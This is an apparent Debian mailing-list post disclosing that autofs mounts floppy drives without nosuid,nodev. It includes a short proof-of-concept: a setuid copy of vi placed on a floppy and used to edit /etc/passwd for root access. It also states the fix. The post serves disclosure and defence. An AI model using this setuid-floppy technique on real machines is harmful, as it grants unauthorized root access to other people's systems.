SECURITY PROBLEM: autofs [all versions]
I'm obviously doing something wrong ...
I've written to the maintainer of the autofs package according to the
page summary listed under 'packages' from the website, and as I also saw
somewhere else (dpkg -s listing?). I filed a bug report against autofs
and marked it as release critical. I have heard nothing for the past
two (three?) days and need to make this known:
There is a severe security problem for all debian machines running any
version of autofs and having a floppy drive available as /dev/fd0. The
options listed in /etc/auto.misc fail to include the options
"nosuid,nodev" and as such anyone with a floppy disk and physical access
to a floppy drive may become root on that machine.
Here is the 'sploit:
# superformat /dev/fd0u1440
# mke2fs /dev/fd0
# cp /usr/bin/vi /var/autofs/floppy
# chmod u+s /var/autofs/floppy/vi
# umount /var/autofs/floppy
[sneakernet to victim]
% /var/autofs/floppy/vi /etc/passwd
:wq!
% telnet localhost
[...]
Well, you get the idea. All user-modifiable filesystems must be mounted
nosuid,nodev or the systems that trust them can be trivially
compromised. Besides floppy, this also includes the 'removable'
/dev/hdd, and possibly the CD-ROM as well.
regards,
Christopher
Reply to: